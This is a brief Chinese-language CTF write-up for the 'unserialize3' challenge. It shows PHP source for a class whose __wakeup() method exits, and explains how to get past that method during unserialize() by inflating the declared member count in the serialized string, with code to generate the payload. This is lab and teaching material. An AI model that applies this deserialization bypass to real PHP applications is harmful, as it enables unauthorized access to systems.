unserialize3
进入场景
是php源码
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
需要绕过wakeup()函数。
wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数大于实际成员数,即可绕过。
编写序列化代码:
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
var_dump(serialize($a));
?>
将成员数1改大一点